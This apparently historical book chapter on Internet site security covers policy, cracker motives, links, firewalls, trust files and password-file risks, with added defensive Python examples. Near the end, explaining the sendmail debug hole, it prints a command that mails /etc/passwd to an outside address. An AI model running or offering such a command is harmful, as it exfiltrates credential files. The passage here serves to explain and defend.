With additional Internet connections being added every day, the management of any Internet site should be concerned with security issues. No site that is connected has absolutely foolproof security, but with the proper knowledge and education, an adequate security level can be maintained to suit the requirements of any organization.
This chapter explains many of the primary issues surrounding Internet security. It is designed to prepare the beginning site administrator or help managers understand system security issues that should be included in the Internet site installation.
Connection to the Internet provides a vast collection of information tools to the corporate or educational user. But for every positive use of the Internet's tools, there is a dark side where people plot to maliciously misuse services. Maintaining the proper level of security at your site can help ensure that people will gain the most from this vast resource of information technology. The following pages explain some basic concepts, tools, and organizational skills needed to maintain various levels of security on the Internet computer resource. These skills can be the "ounce of prevention" needed to guard against a security-related catastrophe in your organization.
Most popular Usenet newsgroups post a document called a FAQ (short for Frequently Asked Questions). Recently, there was such a posting in the newsgroup comp.security.misc. The article mentions that implementing computer security can turn ordinary people into rampaging paranoids.
Often, after a system break-in, everybody wants to jump on the bandwagon of system security. People who may be bored with their own job want to play the exciting game of securing the castle from the bad guys. This becomes even worse when the system administrator goes overboard and loses focus of the primary reason why the computer is connected to the Internet.
Unfortunately, such extreme paranoia often ends up rendering the computer overly restrictive and difficult to use. The FAQ article stated that one university system administrator banned the head of a department from the college mainframe for using a restricted network utility. In the end, the system administrator had a difficult task justifying his implementation of computer security to an unsympathetic department committee.
People can take computer security too far and get caught up in the excitement or knowledge that they may be doing battle with a movie-like computer monster. They forget that the computer is attached to the Internet to provide a positive support service and a competitive advantage to the organization. There must be a balance between responsibly managing the security of an Internet system and providing a system that is easy to use from the network user's standpoint.
I enjoy living in a city where the presence of security is almost hidden from view. When I walk the streets, I don't see barbed wire and bars on every window. I use city services, such as the buses, pay phones, outdoor cafes, and highways, free of hassle. Only once in a while do I see a firearm or interact with the police to ensure that my activities and possessions remain "safe."
My attitude about computer security is the same. When a group of people use the Internet, they want to freely enjoy accessing the resources of the great network. As they access and move information around the globe, they do not want to be hampered by productive services that have been turned off, or have to perform easy tasks in a way that needs pages of notes to accomplish, or endure daily badgering from the system administrators about security.
Remember that beginning computer users usually are afraid their ignorance will lead to trouble. If your Internet environment maintains an attitude of paranoia, you may be hampering productivity and restricting the education the network can provide. An effective environment should encourage people to take advantage of network technology but still ensure a responsibility to maintain the security of the organization's environment and the protection of user files.
Some sites contain classified or highly confidential information. Computers that contain this level of information should not be on the Internet at all. For those sites, highly advanced security mechanisms should be in place and a great effort should be made to secure the data. You should consider your site sensitive if any of the following conditions apply:
One of the tasks of securing a system is to define a security philosophy or plan. This is commonly referred to as a site security policy.
A smart businessperson always creates a business plan before venturing into an investment. When attaching a computer to the Internet, it is prudent to know how you will handle network security. This action is part of being responsible and well organized.
The security policy should include how you plan to prevent break-ins, detect break-ins, and educate users not to blindly contribute to break-ins by opening security holes on your computer.
When creating a policy, you should understand the following:
The site manager should understand what the "appropriate" use of the Internet is and understand what level of performance will be maintained on the system. Before creating your site security policy, be sure to get a copy of RFC 1244 (Request for Comments 1244, available at ftp://is.internic.net:rfc/rfc1244.txt). This document is entitled Site Security Handbook and outlines exactly what your security policy should cover. The IETF Security Policy Working Group (SPWG) also is working on a set of recommended security policy guidelines for the Internet network.
When creating a security policy, the level of security should be planned by estimating the cost of installation and maintenance versus return on investment.
Unless you are part of a very large organization, computer security is probably only one of many responsibilities you have. Generally, security must be implemented so that a single person can be responsible for protecting the organization's assets but can also remain free to perform many other services at the same time.
Time is money and this realization must be figured into the security equation. Checking daily logs, monitoring security programs, and viewing user activity takes a lot of effort and a large amount of time. One of the most expensive parts of maintaining an organization is the payroll expense. Time is expensive and should be used effectively. Some of the tools and concepts mentioned in this chapter can be used to effectively manage the security of a system in a cost-effective manner.
Your security policy also should reflect the computer and network equipment used to maintain the security at your site. Will you create a firewall? How much does a firewall cost to implement? Can your budget afford it? How much time will different types of equipment save you? Is what you are protecting worth the investment? Figure 11.1 compares various security configurations in terms of cost and value.
FIGURE 11.1. Security investment strategies (Cost = man-hours + capital expense).
If you are not a network guru or a computer wizard, I recommend setting up a simple firewall and dedicating one computer to providing Internet connectivity.
Most computers that provide Internet networking services run the UNIX operating system. There are many security tools on the Internet to help minimize the time spent managing UNIX security while providing a healthy degree of system security.
Recently, I have been experimenting with the Windows NT Advanced Server. I expect that future implementations of Internet connectivity will include other popular operating systems. Vendors such as Microsoft have built into their software many security mechanisms that greatly enhance site protection from a possible Internet attack. For example, the Windows NT Advanced Server has been designed to conform to government C2 security standards.
When planning a policy design for Internet connectivity, a system manager should have a clear idea of how restrictive the environment will be to users.
Why are you connecting to the Internet in the first place? Probably to provide your user community with a range of services that provide information. The key is to define that range so that users can freely access information without being discouraged by security restraints.
Remember that typical users are unsure of themselves. In light of this, the Internet connection should not be a bad experience. On the other hand, you don't want to leave security doors wide open for an amateur cracker. The whole purpose of this chapter is to help provide the average system manager who is connecting to the Internet some sensible security guidelines.
One of the first lessons to learn is terminology. For a long time, people have misused the term hacker to mean cracker. In the Internet community, a cracker is a person who maliciously attempts to break into other people's computer systems.
Once a person breaks into a computer, they spend valuable resource dollars (especially if the authorized user pays a monthly bill for the service). Even worse, a cracker typically rearranges the operating system's functionality with back doors, Trojan horses, games, or open security holes for others. The ultimate disaster is when a cracker erases files or disks, cancels programs, or crashes a system. In the PC world, the term cracker is used to describe someone who tampers with copy protection software to illegally distribute the program.
The more accepted meaning of the term hacker is a person who has expertise in the area of computing and networking. A hacker enjoys digging into how an operating system interoperates with a network and invents methods of expanding the capabilities of a system. Hackers on my systems usually help me find security holes and help keep the operating system tuned so that users benefit. A hacker can become a cracker when the individual crosses an ethical line and uses his or her talents in an illegal or unprofessional manner.
Rarely do crackers attack systems for monetary gain. Typically, crackers attack as a test of their skills, to gain status with their peers, as a game, or (more commonly), to use your computer as a stepping-stone to break into another computer. Most crackers cover their tracks to make apprehension difficult.
Another possibility is that your competitors may want to break into your system to secure information that would help them succeed against you in the marketplace. This happens very infrequently compared to other reasons.
A possible source of computer break-ins is from employees or ex-employees. With the recent recession and large number of layoffs in the corporate world, a cracker of this type usually carries a grudge. I have heard about ex-employees changing a computer firm's source code enough to ensure that new product releases fail. Because many of these people are amateur crackers who do not spend a great deal of time breaking into computer systems, they typically use an entry point left exposed when they left the company. (This is another important reason to stay organized.) A small degree of prevention and the implementation of some standard security tools can protect your system from harm.
Eugene Spafford, in a paper entitled "Are Computer Hacker Break-Ins Ethical?," presents five false justifications of why people break into computers or create vandalware:
Crackers will break in to multiple computers (I have seen more than 10 break-ins during a single episode) to make it difficult to find their point of origin. This activity is known as connection laundering in the Internet world.
An example of this is when the cracker logs in to five computers one at a time to perform a malicious stunt on a sixth computer. To track this cracker, the management of all six computers must log the person's activity and turn the logs over to a central coordinator like CERT (defined later). This coordinator compares the logs and traces the movements of the cracker through each system.
You can see why it is usually difficult to prove the guilt of a cracker. That doesn't mean it is impossible, because the authorities do catch people and (usually) confiscate their equipment. Most crackers like to boast about their conquests and leave activity trace logs on their local systems as proof of their deeds. It is very important to maintain a system that makes break-ins difficult. If a cracker can't break into your system with a few simple tools, they will likely move to another system.
As discussed later in this chapter, it is very important to maintain user activity logs. You cannot track or detect possible break-ins without adequate activity logs.
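The log comparison a coordinator performs in the connection-laundering case above, as an added example that is not part of the original chapter: each hop is found by taking the most recent inbound login on the current host before the hop out of it, then moving to the host it came from. The six hosts, the log format, and the addresses are constructed for the example.

```python
from dataclasses import dataclass
from datetime import datetime
from typing import List, Optional

# Constructed login records as six cooperating sites might hand them to a coordinator.
# Format (assumed for this example): <ISO time> <host> login user=<name> from=<host or address>
SAMPLE_LOGS = """
1994-03-04T22:01 host1 login user=guest from=203.0.113.9
1994-03-04T22:06 host2 login user=ftpadm from=host1
1994-03-04T22:12 host3 login user=jsmith from=host2
1994-03-04T22:20 host4 login user=oper from=host3
1994-03-04T22:27 host5 login user=backup from=host4
1994-03-04T22:35 host6 login user=root from=host5
1994-03-04T23:10 host3 login user=jsmith from=ws7.example.org
""".strip()


@dataclass
class Login:
    time: datetime
    host: str
    user: str
    src: str


def parse_logs(text: str) -> List[Login]:
    """Parse the constructed log format into records sorted by time."""
    records = []
    for line in text.splitlines():
        stamp, host, _, user_field, from_field = line.split()
        records.append(Login(datetime.fromisoformat(stamp), host,
                             user_field.split("=", 1)[1], from_field.split("=", 1)[1]))
    return sorted(records, key=lambda r: r.time)


def trace_back(records: List[Login], host: str, not_after: datetime) -> List[Login]:
    """Walk the laundering chain backwards from `host`.

    At each hop take the most recent inbound login on the current host at or
    before the time of the hop out of it, then move to the host it came from.
    Stop when the source is not one of the cooperating hosts: that is the origin.
    """
    logged_hosts = {r.host for r in records}
    chain: List[Login] = []
    current, limit = host, not_after
    while current in logged_hosts:
        candidates = [r for r in records if r.host == current and r.time <= limit]
        if not candidates:
            break
        hop = max(candidates, key=lambda r: r.time)
        chain.append(hop)
        current, limit = hop.src, hop.time
    return chain


def origin(chain: List[Login]) -> Optional[str]:
    """The address the earliest hop in the chain came from, or None for an empty chain."""
    return chain[-1].src if chain else None


if __name__ == "__main__":
    recs = parse_logs(SAMPLE_LOGS)
    chain = trace_back(recs, "host6", datetime.fromisoformat("1994-03-04T22:40"))
    for hop in chain:
        print(f"{hop.time:%H:%M} {hop.host:<6} <- {hop.src} (as {hop.user})")
    print("origin:", origin(chain))
```

The later login on host3 from ws7.example.org is deliberately left in the sample to show that the time filter keeps it out of the chain.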
If you want to read about an administrator who lured and studied an active cracker at AT&T Bell Laboratories, read an article by Bill Cheswick entitled "An Evening with Berferd, in Which a Cracker Is Lured, Endured, and Studied." Bill and his staff created a "chroot" jail where the cracker unknowingly logged in to a restrictive environment. The staff then watched as the cracker attempted to use an arsenal of cracking tools to gain control of the system. The administrators were able to gain useful information to improve the security of their systems. At the end of their observation, the cracker attempted to erase all the disks on the computer system. Most occurrences of an Internet-related break-in are not catastrophic and are usually done as a challenge or a game.
Now that you've learned about who breaks into a computer, why people break into computers, and what they do once they are in, it is time to discuss how people break into computers.
To understand how people break in, you must understand the following aspects of your system:
This sounds like a large amount of information to cover. Yet a very basic understanding of these topics can help you protect computers from an outside threat on the Internet.
One of the key elements of computer security is understanding the connection to the Internet. The more you understand this link, the greater success you will have with security tools. Internet links typically range from low-cost dial-up solutions to higher-cost leased lines. Their functionality ranges from user-to-LAN connectivity to LAN-to-LAN connectivity. As you know, part of your investment cost is the associated cost of the Internet link. Each of the links described in the following sections affects the amount of time you spend monitoring security.
NOTE For more detail on the different types of Internet connections, see Chapter 7, "Finding Access as a User," and Chapter 8, "Finding Access as an Organization."
The lowest-cost Internet connection is when you have PC accounts on an Internet computer and leave the security to someone else. Most Internet service providers sell you an account on their Internet computer that you can use for Internet connectivity.
Typically, the user dials in using a PC modem and a communications software package. This is one of the best ways to find out whether the Internet is useful to your organization without making a large initial investment. The only security you need to implement here is to teach users about maintaining secure passwords and to make sure that they don't abandon the account. A cracker typically looks for an account that is seldom or never logged on to. In that way, there is less chance the authorized account user will detect and report a break-in.
An even lower-cost method of using Internet electronic mail is to get a CompuServe or America Online account for your computer users. Again, sensible password security should be demonstrated by the person who uses the account.
A low-cost purchased account should never be shared by multiple users. This is a security gap that is taken advantage of by many crackers. When a group of people want joint access to the Internet network, they should have separate accounts. If an intruder breaks in and runs your bill up into the thousands of dollars, you want to go to one responsible person to trace account activity. When multiple people share an account, the password is rarely changed and is typically shared publicly. There have been cases in which people allow children or friends to use their accounts, thus creating more opportunity for security to be breached and operators to open up security holes on the system.
If you are setting up Internet access using a bank of modems or terminal servers, you should take some precautions. Misconfigured hardware easily creates an open security door for an intruder. Make sure that the following items are checked before allowing people to use the modem equipment:
You should check the terminal server manuals, system manuals, and modem manuals for the proper configuration of each device.
An example of a security enhancement to dial-up modems is a security box. SecurID from Security Dynamics in Cambridge, MA, is such a box. The system gives each user a credit card-sized device that electronically displays a generated personal identification number (PIN). The remote user must use this PIN, along with a password, to log in to the security box and then in to the computer system. The security box changes the PIN at regular intervals so that the device must be present at login time.
When the organization has enough people who desire access to the Internet, or when the information obtained from the Internet is very large in size, a faster and more efficient link can be used.
The latest addition to many Internet service provider connections has been the dial-up router connection. This provides a link between your network and the Internet network (an arrangement commonly referred to as LAN-to-LAN connectivity) using the public phone lines. In this case, your local network is now part of the ever-expanding Internet network. Your users have direct access to the Internet from local computers and, conversely, the Internet community has access to your local computers.
Very cheap security solutions include the installation of a SLIP connection. SLIP is an implementation of TCP/IP, which operates over a serial line. The SLIP connection can provide a network link between two computers using modems and ordinary phone lines. One modem dials another, and the network connection takes place.
After the birth of SLIP came a more advanced solution called Point-to-Point Protocol (PPP). A PPP connection is more efficient and provides security through the enhancement of CHAP (Challenge Handshake Authentication Protocol). The use of CHAP requires a three-way handshake between the dial-up network devices using encrypted passwords. These passwords are changed using a hashing function each time the devices connect. This makes it virtually impossible for an intruder to gain access through a dial-up-IP connection into your network.
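The CHAP exchange described above, as an added example that is not code from the chapter: the router sends a challenge, the dialling peer answers with MD5 over the identifier, the shared secret and the challenge (the CHAP-with-MD5 algorithm of RFC 1994), and the router compares. The secret is configured on both sides and never crosses the line, and a fresh random challenge per connection is what makes a captured response useless later. The peer name and secret are constructed values.

```python
import hashlib
import hmac
import os
from typing import Dict, Tuple

# Constructed secrets; in PPP the secret is configured on both peers and never sent over the line.
SECRETS: Dict[str, bytes] = {"branch-router": b"example-dialup-secret"}


def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """CHAP with MD5 (RFC 1994): Response = MD5(Identifier || Secret || Challenge)."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


class Authenticator:
    """The side that issues the challenge (here: the service provider's dial-up router)."""

    def __init__(self, secrets: Dict[str, bytes]):
        self.secrets = secrets
        self.identifier = 0

    def challenge(self) -> Tuple[int, bytes]:
        # A fresh random challenge per link; the identifier ties a response to its challenge.
        self.identifier = (self.identifier + 1) % 256
        return self.identifier, os.urandom(16)

    def verify(self, name: str, identifier: int, challenge: bytes, response: bytes) -> bool:
        secret = self.secrets.get(name)
        if secret is None:
            return False
        expected = chap_response(identifier, secret, challenge)
        return hmac.compare_digest(expected, response)


class Peer:
    """The dialling side: proves it knows the secret without transmitting it."""

    def __init__(self, name: str, secret: bytes):
        self.name = name
        self.secret = secret

    def respond(self, identifier: int, challenge: bytes) -> Tuple[str, bytes]:
        return self.name, chap_response(identifier, self.secret, challenge)


def run_handshake(auth: Authenticator, peer: Peer) -> bool:
    """Challenge -> Response -> Success/Failure: the three-way exchange the text describes."""
    identifier, challenge = auth.challenge()                   # 1. Challenge
    name, response = peer.respond(identifier, challenge)       # 2. Response
    return auth.verify(name, identifier, challenge, response)  # 3. Success or Failure


def replayed_response_is_rejected(auth: Authenticator, peer: Peer) -> bool:
    """A response captured on the line fails later because the next challenge differs."""
    identifier, challenge = auth.challenge()
    name, captured = peer.respond(identifier, challenge)
    if not auth.verify(name, identifier, challenge, captured):
        return False
    next_identifier, next_challenge = auth.challenge()
    return not auth.verify(name, next_identifier, next_challenge, captured)


if __name__ == "__main__":
    router = Authenticator(SECRETS)
    print("genuine peer:", run_handshake(router, Peer("branch-router", SECRETS["branch-router"])))
    print("wrong secret:", run_handshake(router, Peer("branch-router", b"guess")))
    print("replay rejected:", replayed_response_is_rejected(router, Peer("branch-router", SECRETS["branch-router"])))
```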
Typically, in a dial-up-IP solution, a dial-up router is used to provide the connectivity. The router is a device that passes information packets between the segment of the Internet network to which you are connected and your local network. The Internet information could be a file transfer, remote login, Gopher information, or many of the other information tools available. The router can be programmed to support your security philosophy and discourage break-ins. The best routers for Internet connectivity provide a high degree of filtering and logging and enable you to control when the connection can be made.
Packet filtering is the ability of the router to selectively pass only the packets you specify into or out of your local network. The selection process can be based on host computers, network segments, or service types. In other words, you can limit the hosts who talk to the Internet, what internal networks communicate with the Internet, and what tools can be used on the Internet connection.
A dial-up router provides a high degree of filtering. The filtering can be by host, network, or protocol. If your security philosophy wants to allow only FTP (file transfer), Gopher, and the WWW and wants to disallow remote logins from the Internet, appropriate filters can provide this protection.
The modem on the dial-up router can be set to allow Internet connectivity only during certain hours or specific days. Most crackers conduct break-ins during evenings or weekends to lessen the chances of someone detecting their activity.
If your router is set to allow Internet connectivity only during normal business hours, most Internet crackers will not be interested in your system. Employees or ex-employees usually work during business hours and may not be able to become "midnight crackers" if you block access during the evenings or weekends. Again, such filtering should match your security philosophy and your target of service functionality (and availability) to best suit your organizational needs.
When your Internet traffic needs grow, you can justify the cost of a leased line. Leased lines can range from a 56 Kbps line up to higher speeds. What you choose depends purely on your pocketbook. This type of connection uses a router much like the dial-up connection does. However, instead of "bandwidth on demand," as in the dial-up solution, the leased line provides a constant connection to the Internet by using a direct permanent line between you and the Internet service provider.
A popular router used for a leased-line Internet solution is the Cisco router. It has the same filtering capabilities as the dial-up router, although you cannot maintain the hours of operation as you can with the dial-up line. The cracker usually has access to your computers at a more acceptable speed than the dial-up solution. It is common for a site directly connected to the Internet to extend security beyond the filtering on the router by designing some sort of advanced firewall system.
An adequate level of security can be maintained by combining knowledge of computer security issues, the security features a vendor can provide on networking equipment, public domain security software, and adequate user education. What level of security is needed? That should be outlined in your security policy.
In many universities, all networks have open access to the Internet. In an atmosphere of open learning, any user can directly use the resources of the Internet without the hindrances of security mechanisms that may inhibit network services.
Many corporations may want to provide Internet tools, such as FTP, Gopher, WAIS, and the WWW on the desktop workstation. This means that every network in the corporate environment may be left open to the risk of attack. The corporation's Internet security policy must include a mechanism to protect certain sensitive hosts from being open to attack.
The benefit of such an arrangement is increased productivity by letting users conveniently access Internet resources from a highly productive Macintosh or PC. Many users may not use the Internet if you require them to log in to a single Internet-connected host to access Internet information, especially if the procedure makes them learn about the complicated UNIX environment.
Blindly attaching your local area network to the Internet without some way of protecting hosts that store competitive or sensitive information is an open invitation for security problems.
One of the simplest protection methods is to ensure that your router to the Internet supports filtering. Such routers are called screening routers. Many popular routers support packet filtering at the host level, network level, and service (protocol) level. Information is carried on the Internet network in various size packets. Each information packet carries with it a description of the source, destination, and service type (login, mail, and so forth), which enables routers to selectively filter unwanted data.
Routers can be configured to prohibit traffic from going from the Internet to an internal host or internal network subnet (an internal network can be divided into management pieces called subnets). Routers also can be configured to prohibit traffic that participates in dangerous services such as TFTP (trivial file transfer without passwords) and lpd (remote printing).
An example of the intelligent use of filters is to set up a filter to allow only electronic mail to reach one host on your local network. From there, the specified host can distribute the mail internally, thus reducing the number of hosts that have e-mail contact with the Internet. The famous Internet worm exploited a bug in the sendmail e-mail program and used it to gain access to many hosts throughout the Internet. Router filtering is one method of reducing the security risk at your facility.
Firewalls tend to be a compromise between ease of use and security. The local network that is available to the Internet network can be considered the "zone of risk." Without a firewall, your entire local network becomes a zone of risk.
A firewall reduces your zone of risk by defining a smaller area that is accessible to the Internet. By defining a smaller zone of risk, you reduce the area you need to cover to detect an Internet intruder. There are many configurations of firewalls using various components and configurations. By using only a screening router (as mentioned in the preceding section), you set up a simple firewall that reduces the area you have to worry about for security purposes.
Two basic approaches exist. The first is to design a firewall to prohibit any service that is not explicitly permitted through the Internet connection. If you don't tell your users that a service is available, turn it off.
The second approach is just the opposite. It involves designing a firewall where all services not explicitly prohibited are permitted. The difference is that, in the first case, the firewall is designed to block everything and services are enabled one by one after careful risk assessment. In the second case, the administrator must plot out the weak points in security and then disable those services that are too risky to leave available. The users often perceive the first approach as constricting and view the firewall as a hindrance to productivity. The second approach allows the users more freedom to use the Internet resources, and gives them more freedom to create security holes in your firewall configuration.
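The two firewall approaches, the screening-router filters by host, network and service, and the "mail only to one host" filter from the earlier section, as an added example that is not from the chapter: a first-match rule table with a default action, built once each way and run over the same inbound packets. The internal network, the mail hub address, and the outside address are constructed; the port numbers are the well-known assigned numbers for the named services.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional

# Well-known ports from the assigned-numbers list for the services the chapter names.
PORTS = {"ftp": 21, "telnet": 23, "smtp": 25, "tftp": 69, "gopher": 70,
         "www": 80, "lpd": 515, "nfs": 2049}

INTERNAL = "192.0.2.0/24"       # constructed internal network
MAIL_HUB = "192.0.2.10/32"      # constructed: the one host allowed to receive Internet mail


@dataclass
class Packet:
    src: str
    dst: str
    proto: str   # "tcp" or "udp"
    dport: int


@dataclass
class Rule:
    action: str               # "permit" or "deny"
    dst: str = "0.0.0.0/0"    # destination host or network
    proto: str = "any"
    dport: Optional[int] = None

    def matches(self, p: Packet) -> bool:
        return (ip_address(p.dst) in ip_network(self.dst)
                and self.proto in ("any", p.proto)
                and (self.dport is None or self.dport == p.dport))


class ScreeningRouter:
    """Inbound filter: the first matching rule wins, the default decides everything else."""

    def __init__(self, rules: List[Rule], default: str):
        self.rules = rules
        self.default = default

    def decide(self, p: Packet) -> str:
        for rule in self.rules:
            if rule.matches(p):
                return rule.action
        return self.default


# Approach 1: block everything, then enable FTP, Gopher, WWW, and mail to the hub only.
DENY_UNLESS_PERMITTED = ScreeningRouter([
    Rule("permit", INTERNAL, "tcp", PORTS["ftp"]),
    Rule("permit", INTERNAL, "tcp", PORTS["gopher"]),
    Rule("permit", INTERNAL, "tcp", PORTS["www"]),
    Rule("permit", MAIL_HUB, "tcp", PORTS["smtp"]),
], default="deny")

# Approach 2: allow everything, then disable the services judged too risky.
# Mail needs two rules here: permit the hub first, then deny SMTP to the rest.
PERMIT_UNLESS_DENIED = ScreeningRouter([
    Rule("permit", MAIL_HUB, "tcp", PORTS["smtp"]),
    Rule("deny", INTERNAL, "tcp", PORTS["smtp"]),
    Rule("deny", INTERNAL, "tcp", PORTS["telnet"]),
    Rule("deny", INTERNAL, "udp", PORTS["tftp"]),
    Rule("deny", INTERNAL, "tcp", PORTS["lpd"]),
    Rule("deny", INTERNAL, "any", PORTS["nfs"]),
], default="permit")

OUTSIDE = "198.51.100.7"   # constructed Internet address
INBOUND = [
    Packet(OUTSIDE, "192.0.2.20", "tcp", PORTS["www"]),
    Packet(OUTSIDE, "192.0.2.20", "tcp", PORTS["smtp"]),
    Packet(OUTSIDE, "192.0.2.10", "tcp", PORTS["smtp"]),
    Packet(OUTSIDE, "192.0.2.20", "tcp", PORTS["telnet"]),
    Packet(OUTSIDE, "192.0.2.20", "udp", PORTS["tftp"]),
    Packet(OUTSIDE, "192.0.2.20", "tcp", 6000),   # a service nobody thought about
]


def compare_policies(packets: List[Packet]) -> List[tuple]:
    """(proto, port, decision under approach 1, decision under approach 2) per packet."""
    return [(p.proto, p.dport, DENY_UNLESS_PERMITTED.decide(p), PERMIT_UNLESS_DENIED.decide(p))
            for p in packets]


if __name__ == "__main__":
    for row in compare_policies(INBOUND):
        print("%-3s %5d  deny-by-default=%-6s permit-by-default=%s" % row)
```

The last packet is the point of the second approach's "freedom to create security holes": a service nobody listed passes the permit-by-default router and is stopped by the deny-by-default one.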
Recent efforts have been made to increase the security of Internet electronic mail. The enhancements center around the transparent encryption of the mail message. Using this method, electronic mail would be able to move around the Internet, and servers en route to the message's destination could not read its contents.
In the present form of electronic mail (using the SMTP protocol), most mail messages are text and can be read by anyone who captures them. A growing issue concerning Internet privacy is the ethical concern of system administrators reading electronic mail to detect security infractions.
Most Internet services use well-known ports to communicate. A system administrator can select which services to leave on and which to turn off through various mechanisms that limit port access.
When an organization asks for a connection to the Internet, it usually has a basic idea what it wants the connection for. It may be to provide file transfer (FTP) service to a specific user base, enable members to communicate with professional peers (e-mail), or enable the organization to participate in technical discussions (Usenet news, mailing lists).
A wealth of information is also provided by Gopher, the WWW, and WAIS. Many online database systems are available through the Internet using the remote login program, Telnet. Your Internet security policy should state which services and functionality the connection will provide. I recommend turning off any other service you do not want to offer. These "other" services can open the door of opportunity for an intruder.
Many well-known security organizations recommend that some of your services be filtered on your Internet router. These services are considered dangerous and do not have to be operated on the Internet. It is recommended that the following list of services be filtered:
System administrators should know what services they want to offer through the Internet. Any other service should be filtered through the router. You can obtain a list of the services you want by looking in the assigned numbers FAQ: is.internic.net:rfc/rfc1700.txt.
Many users may keep a file named .rhosts in their home directories. This file lists "trusted" users from other systems that are allowed to log in to the account without a password. It also allows remote commands like rsh and rcp to be operated without a password.
The rsh command enables a remote person to issue a command without logging in. The rcp command enables a person to copy a file without ever logging in to the system. My recommendation is that, because .rhosts files are dangerous, they should not be allowed on your Internet system. Run a nightly program that erases these files from your user accounts. You can send the users an automated message stating that the system security policy does not allow the .rhosts file. Removing these files can anger your users, but every system administrator has to make that choice.
The exception may be the root account (remote execution may be required for network backups). But many vendor-supplied backup mechanisms have security workarounds so that you do not even need a root-owned .rhosts file.
You can use the showmount command to show remote mounted file systems on a file server. Generally, on a UNIX system, the /etc/exports file lists the systems allowed to remote mount your file system.
It is dangerous to let a computer on the Internet be a file server for other systems. You should at least filter out NFS packets on your Internet router, but a better move is to turn off NFS completely on your Internet computer system. Many dangerous security holes surround access to your file systems.
Trusted hosts are usually other computer systems that are thought of as secure and need a smaller degree of security when accessing your system. The list is commonly found in a file named /etc/hosts.equiv on a UNIX system. Trusted hosts can access services such as remote printing and file sharing without requiring passwords or security constraints. Be very careful about which hosts are trusted on the system connected to the Internet network.
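A trust audit covering the three files discussed above (.rhosts in home directories, /etc/exports, and /etc/hosts.equiv), as an added example that is not code from the chapter: the nightly .rhosts sweep with its user notice, plus checks that flag a hosts.equiv entry of "+" (trust every host, or every user on a host) and an exports line with no client list or a "*" client. The home directories and file contents are constructed in a temporary directory, and the exports syntax assumed is the Linux-style "path client(options)" form.

```python
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

# Constructed .rhosts contents for three sample accounts (None = the user keeps no such file).
SAMPLE_RHOSTS: Dict[str, Optional[str]] = {
    "alice": "+ +\n",                 # trusts every user on every host
    "bob": "ws4.example.org bob\n",   # trusts one user on one host
    "carol": None,
}


def build_sample_homes(root: Path) -> Path:
    """Create home directories under `root` from the constructed data above."""
    for user, contents in SAMPLE_RHOSTS.items():
        home = root / user
        home.mkdir(parents=True, exist_ok=True)
        if contents is not None:
            (home / ".rhosts").write_text(contents)
    return root


def make_sample_tree() -> Path:
    """A throwaway home-directory tree for running the sweep offline."""
    return build_sample_homes(Path(tempfile.mkdtemp()) / "home")


def find_rhosts(home_root: Path) -> List[Path]:
    """Every .rhosts file directly under a home directory."""
    return sorted(p for p in home_root.glob("*/.rhosts") if p.is_file())


def remove_rhosts(home_root: Path) -> List[str]:
    """The nightly sweep: delete each .rhosts and return the notice to send its owner."""
    notices = []
    for path in find_rhosts(home_root):
        path.unlink()
        notices.append(f"{path.parent.name}: your ~/.rhosts file was removed; "
                       "site security policy does not allow it.")
    return notices


def audit_hosts_equiv(text: str) -> List[str]:
    """Flag /etc/hosts.equiv entries that trust every host, or every user on one host."""
    findings = []
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if not fields:
            continue
        if fields[0] == "+":
            findings.append(f"trusts every host: {line.strip()!r}")
        elif len(fields) > 1 and fields[1] == "+":
            findings.append(f"trusts every user on {fields[0]}: {line.strip()!r}")
    return findings


def audit_exports(text: str) -> List[str]:
    """Flag /etc/exports lines with no client list or a '*' client (Linux-style syntax assumed)."""
    findings = []
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if not fields:
            continue
        clients = [f.split("(", 1)[0] for f in fields[1:]]
        if not clients or "*" in clients:
            findings.append(f"exported to any host: {fields[0]}")
    return findings


if __name__ == "__main__":
    homes = make_sample_tree()
    print("found:", [str(p) for p in find_rhosts(homes)])
    for notice in remove_rhosts(homes):
        print(notice)
    print(audit_hosts_equiv("+\nws4.example.org\nws9.example.org +\n"))
    print(audit_exports("/home\n/usr/local ws4.example.org(ro)\n/pub *(ro)\n"))
```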
The NIS (Network Information System, formerly called Yellow Pages) is a network database shared by multiple computers.
Typically, there is an NIS server and NIS clients. The NIS server contains information about accounts, passwords, remote file sharing, trusted hosts, and other important security information. In the past, many security bugs were found in the NIS system (these bugs are fixed in more recent versions of the database system).
Before using NIS on a network connected to the Internet, make sure that you study how each client and server file should be set up. It is very easy to accidentally create a large security hole just by leaving the default NIS configuration active or by mistyping a line in an operating system configuration file.
Software security holes provide a common entry point for Internet intruders. The problem resides in poorly written programs distributed with the operating system. These programs allow a user to operate them for reasons other than their original purpose.
One of the most publicized examples of a software bug has been the sendmail debug security hole. The Internet worm used it to exploit systems throughout the entire Internet network. The Internet worm also took advantage of a bug in the fingerd (finger daemon) program.
With every new release of an operating system, new security holes are created. The best way to close up these holes is to subscribe to an active security mailing list so that you will be notified immediately each time a new hole is found. If you maintain an older system, check the FTP archives at cert.org to get a list of discovered security holes in various operating systems.
Backups should be part of every well-run operation. If you are connected to the Internet, make sure that you run backups on a regular basis.
If an intruder breaks into a system, he or she may remove or change files. Once the break-in is detected, a good backup can help you clean up the system and put things back in order. Once, I watched someone break into a computer and change a user's account during the evening. After I locked the intruder out, I was able to quickly restore the account using backups. The next morning, the regular account user was not affected and resumed work not knowing that his account had been changed the night before (although I did have a talk with him later about creating a more secure password and keeping an eye out for peculiar things in his account).
One of the most vulnerable places on a computer system is the password file, typically named /etc/passwd on a UNIX operating system. The password file is the first point of attack. It has been found that more than 80 percent of all computer attacks that come from outside a networked system are based on exploitation of weak passwords. A cracker can use a variety of techniques to access your password file. For a number of years, there was a security bug in the sendmail program (the program used to manage the e-mail system on a computer). A cracker could connect to the e-mail port of a computer, turn on debug mode, and then issue a command like this one:
mail user@anywhere.com < /etc/passwd
The e-mail system would then mail your password file to the cracker. Other security holes like this one presented similar access to the password file. Most well-known bugs have been fixed, and it is important that you have these fixes installed. Many of them have been fixed in newer releases of operating systems provided by vendors.
